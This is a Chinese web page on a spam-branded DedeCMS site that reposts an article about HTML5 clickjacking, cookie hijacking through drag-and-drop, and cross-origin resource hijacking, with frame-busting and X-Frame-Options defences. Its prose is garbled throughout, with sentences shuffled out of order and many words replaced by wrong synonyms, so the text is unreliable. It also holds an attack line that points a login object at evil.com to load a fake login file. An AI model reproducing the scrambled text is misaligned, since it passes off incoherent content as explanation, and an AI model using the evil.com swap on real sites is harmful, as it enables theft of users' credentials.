织梦CMS - 轻松建站从此开始!

WWW-36AB-COM【首页★新址】WWW-36AB-COM_日韩★WWW-36AB-COM

当前位置: 主页 > www-36ab-com > HTML >

点击劫持可以诱使你宣布一条虚假微博、或者发送一封虚假邮件甚至偷取你的小我私家信息

时间:2012-11-27 06:00来源:网络整理 作者:管理员 点击:
下面我们要讲到一类的HTML5安全问题,也就是劫持的问题。 一、ClickJacking-点击劫持 这种攻击方式正变得越来越普遍。被攻击的页面作为iframe,用Mask的方式设置为透明放在上层,恶意代码偷偷地放在后面的页面中,使得一个页面看 起来似乎是安全的,然后诱骗

被打击的银行页面作为透明的 层安排在上层。

他的帐号就已经被偷取了, 三、CORJacking-跨域资源劫持 CORJacking是指跨源资源劫持,这里面我 们可以实现一些加密的逻辑,一个域的Cookie只能被本域所访问,这个头答允页面被iframe使用时是否正常渲染,只要欺骗用户进行拖放行为,如果页面可以正常显示并加载。www-36ab-com

这样操作拖放操纵、XSS和其他技巧, 把Cookie从一个域拖拽到另外一个域里 实现道理其实和ClickJacking类似,这个其实很容易做到, 双击代码全选 1 document.getElementByName(Login).item(0).src=http://evil.com/login.swf; 那么当用户在这样的登录框里输入本身的用户名和密码并登录时。

用Mask的方法设置为透明放在上层,因为此刻Web应用里, 这个问题在差别浏览器里面表示是纷歧致的,到达窃取用户信息或者劫持用户操纵的目的。

这里有一个测试工具clickjacktest可以检测你的页面是否有点击劫持的风险,下面我们要讲到一类的HTML5安详问题,如果页面显示为一片空白。

音频等,就可以把用户某个域的信息发送到另外一个域里,有兴趣的伴侣可以下去自行测试,也就是劫持的问题,在同源计谋里。

HTML5应用有各类差此外资源,那么暗示页面比力安详,点击劫持可以诱使你宣布一条虚假微博、或者发送一封虚假邮件甚至偷取你的小我私家信息, 想象一下,劫持Cookie,但是拖放操纵是不受同源计谋限制的, 双击代码全选 12345 object classid=clsid:xxxxxxx-xxxx-xxxx-xxxxxx id=Login width=100%height=100% codebase = http ://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab param name=movievalue=Login.swf / param name=qualityvalue=high / embed src=Login.swfquality=high width=50% height=50% / object 当页面存在XSS缝隙时,具体代码就是: 双击代码全选 12 if (top !==window) top.location = window.location.href; Facebook和Twitter都使用了这种方法。

可以结构跨域正当请 求,作为用户登录框,有大量需要用户拖放完成的操 作,使得一个页面看 起来好像是安详的,之前有一 个研究者就在Facebook上成立了一个应用。

下图中,但是这种方法并不是完全奏效的。

二、CookieJacking-Cookie劫持 ClickJacking只涉及点击操纵, 一个拐骗拖放的小游戏 我们该当如何防备ClickJacking、CookieJacking呢? 1、X-Frame-Options:所有的现代浏览器都支持X-Frame-Options HTTP头, 不外此刻至少80%以上的网站都没有注意到点击劫持和cookie劫持的问题并加以掩护,我想可能大大都人城市去实验而且不会有警惕心理,用户看到的是欺诈页面上显示的信息并进行输入和点击,但是HTML5的拖放API使得这种打击扩大到拖放操纵,那么暗示这个页面存在被点击劫持打击的风险,但是真正的用户行为是产生在银行页面上的,我这篇文章的主要目的就是提醒大家注意到这种隐蔽的打击方法并有针对性的进行防止。

打击者可以操作如下脚本把swf文件替换为欺诈的虚假资源,例如打击者可以使用204转向或者禁用Javascript的方法来绕过(例如iframe沙箱),下图中的页面就是当X-Frame-Options生效时的效果, 2、Javascript方法 这种方法非经常见,恶意代码偷偷地放在后头的页面中, 。

欺诈的页面安排在下层。

例如下面的代码载入了一个swf文件,被打击的页面作为iframe,如果页面存在XSS缝隙,例如下图可以诱使我们宣布一条虚假的Twitter动静,那么打击者可能通过跨域资源的劫持进行打击。

这个应用的成果是让用户把图片上美女的衣服拖拽下来,你可以输入一个网址并点击Test, 一、ClickJacking-点击劫持 这种打击方法正变得越来越普遍,这些资源可以通过 DOM访问和控制,Silverligh,然后拐骗用户点击网页上的内容,视频,例如Flash文件。

(责任编辑:admin)
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
用户名: 验证码: 点击我更换图片
栏目列表
推荐内容